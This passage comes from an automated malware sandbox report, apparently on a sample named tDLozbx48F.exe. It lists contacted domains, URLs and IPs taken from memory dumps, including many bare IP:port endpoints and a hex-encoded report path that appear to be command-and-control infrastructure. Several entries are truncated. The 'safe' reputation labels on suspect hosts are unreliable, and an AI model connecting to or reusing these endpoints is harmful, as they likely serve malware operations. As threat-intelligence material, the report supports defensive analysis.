https://52.68.125.8:443	0%	Avira URL Cloud	safe
http://77.240.38.138:8080	0%	Avira URL Cloud	safe
http://46.226.106.173:8080	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
archive-01.torproject.org	159.69.63.226	true	false	unknown
cybereason.com	45.60.107.106	true	false	unknown
cyble.com	192.0.78.152	true	false	high
twitter.com	104.244.42.129	true	false	high
youtube.kz	172.217.19.238	true	false	unknown
cyware.com	66.33.60.67	true	false	high
google.kz	172.217.19.164	true	false	high
ip-api.com	208.95.112.1	true	false	high
x.com	104.244.42.65	true	false	high
blog.cyble.com	104.26.6.177	true	false	unknown
archive.torproject.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://twitter.com/f10RkK61wN?197=0	false		high
http://google.kz/5N5Gv78Z7d?s=194	false		high
http://youtube.kz/G4XvFNPg1L?27=1	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cyble.com/wp-content/plugins/unlimited-elements-for-elementor-premium/assets_libraries/filte	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/telecommunications/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/apt/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.189.159.121:8001/%50%57%4F%59%66%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74	tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800E5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cyble.com/products/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/wp-content/plugins/gutenberg/build/i18n/index.min.js?ver=bd5a2533e717a1043151	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/tech-scam/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://partnercentral.cyble.com/partner/registration	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.161.20.142:8080	tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=2.0.2	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://138.201.197.74:8080	tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.g2.com/assets/write_a_review_entry.js	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abs.twimg.com/favicons/twitter-pip.3.ico	tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5267C000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526A8000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AF000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526E8000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AB000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527DC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://46.226.106.173	tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800C4000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52695000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cyble.com/remote-access-trojan/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/trojan/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-Counterfeit.png?fit=1024%2C512&am	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://unpkg.co/gsap	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.onesignal.com/sdks/OneSignalSDK.js?ver=1.0.0	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i0.wp.com/cyble.com/wp-content/uploads/2023/01/Cyble-Blogs-Google-Ads.jpg?fit=1024%2C512&amp	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/blog/trojanized-super-mario-game-installer-spreads-supremebot-malware/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://66.42.56.128:80	tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.226.106.173:80802	tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52695000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cybereason.com/eQJtPTLM8F?s=161Khttp://cybereason.com/YZwliMowVX?11=0Ehttp://youtube.kz/fBQEE	tDLozbx48F.exe, tDLozbx48F.exe.1.dr	false	Avira URL Cloud: safe	unknown
https://cyble.com/ransomware/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/vulnerability/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/announcement/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://hu-manity.co/	tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527A7000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52678000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526E4000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526A4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://65.21.49.163:80802	tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800F2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.77.125.6	tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://youtube.kz/vNKzHG6mpr?79=2	tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://149.28.31.122:8080	tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cyble.com/malware/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/external-threat-profile-report/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://46.235.26h	tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52823000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://a.omappapi.com/app/js/api.min.js	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/resources/research-reports/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/wp-content/plugins/elementor-pro/assets/css/widget-search-form.min.css?ver=3.25.4	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/threat-actor/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i0.wp.com/cyble.com/wp-content/uploads/2023/06/UmbralStealer-Super-Mario-Bros-Blog.jpg?fit=3	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/hacktivism/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.25.10	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.25.10	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/blog/cyble-report-on-counterfeit-goods/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i0.wp.com/cyble.com/wp-content/uploads/2023/06/UmbralStealer-Super-Mario-Bros-Blog.jpg?fit=1	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.191.188.207:80	tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cyble.com/blog/new-report-highlights-critical-cybersecurity-challenges-facing-the-u-s/2/?0=0	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://c0.wp.com/c/6.7.1/wp-includes/js/mediaelement/wp-mediaelement.min.css	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://amibreached.com/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cyble-hawk-reading-email.jpg?resize=768%2C768	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stats.wp.com/e-202448.js	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/wp-content/uploads/elementor/css/post-19102.css?ver=1732561088	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://115.231.163.168:8082	tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cyble.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.css?ver=5.15.	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://167.86.115.P	tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800B9000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5268F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cyble.com/wp-content/plugins/gutenberg/build/hooks/index.min.js?ver=84e753e2b66eb7028d38	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cyble-hawk-reading-email.jpg?resize=300%2C300	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cyble-hawk-reading-email.jpg?w=1000&ssl=1	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://twitter.com/MW3w07Eq7H?65=2Ghttp://twitter.com/uPbarpDBll?s=167Ehttp://cyware.com/ZN5noaxoFs?	tDLozbx48F.exe, tDLozbx48F.exe.1.dr	false		high
https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-CERT-1.jpg?fit=300%2C150&ssl=	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/cropped-cyble-threat-intelligence-png/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://47.110.140.182:8080	tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://164.90.185.9:443	tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.226.106.	tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800C4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cyble.com/blog/nexus-the-latest-android-banking-trojan-with-sova-connections/cyble-blogs-nex	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=2.5.4	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abs.twimg.com/responsive-web/client-web/icon-ios.77d25eba.png	tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5267C000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526A8000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AF000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526E8000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AB000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/wp-content/plugins/jetpack/modules/infinite-scroll/infinity.css?ver=20140422	tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://partnernetwork.cyble.com/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cyble.com/blog/insights-from-2023-2024-annual-cyber-threat-report/cyble-blogs-cyber-threats/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-U.S.png?fit=1200%2C600&ssl=1	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/solutions/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css?ver=3.25.10	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/wp-content/uploads/2021/11/cropped-Cyble-Black-Logo-1-2127859258-1637602085949.png	tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-CERT-1.jpg?fit=1200%2C600&ssl=1	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wpadvancedads.com/	tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://to.getnitropack.com/p	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/wp-content/plugins/link-whisper-premium/js/frontend.min.js?ver=1732561086	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/solutions/third-party-risk-management/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-ICS.jpg?fit=300%2C150&ssl=1	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://140.238.218.94:8080	tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52823000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52657000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cyble.com/wp-content/plugins/ultimate-elementor/assets/lib/isotope/isotope.min.js?ver=1.37.2	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.77.125h	tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52711000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.189.159	tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800E5000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526BB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://amibreached.com	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cybereason.com/uB78yv4j06?20=1Ghttp://twitter.com/78d0XJWYXX?147=0Mhttp://blog.cyble.com/vcDA	tDLozbx48F.exe, tDLozbx48F.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://65.21.49.h	tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800EB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://c0.wp.com/c/6.7.1/wp-includes/js/dist/vendor/wp-polyfill.min.js	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://52.68.125.8:443	tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.240.38.138:8080	tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.226.106.173:8080	tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52695000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rankmath.com/wordpress/plugin/seo-suite/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/cryptominer/	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-U.S.png?fit=300%2C150&ssl=1	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.25.10	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cyble.com/blog/new-report-highlights-critical-cybersecurity-challenges-facing-the-u-s/157/?0	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i0.wp.com/cyble.com/wp-content/uploads/2021/11/cropped-Cyble-Black-Logo-1-2127859258-1637602	tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.244.42.65	x.com	United States	13414	TWITTERUS	false
104.244.42.129	twitter.com	United States	13414	TWITTERUS	false
172.217.19.238	youtube.kz	United States	15169	GOOGLEUS	false
159.69.63.226	archive-01.torproject.org	Germany	24940	HETZNER-ASDE	false
45.60.107.106	cybereason.com	United States	19551	INCAPSULAUS	false
172.217.19.164	google.kz	United States	15169	GOOGLEUS	false
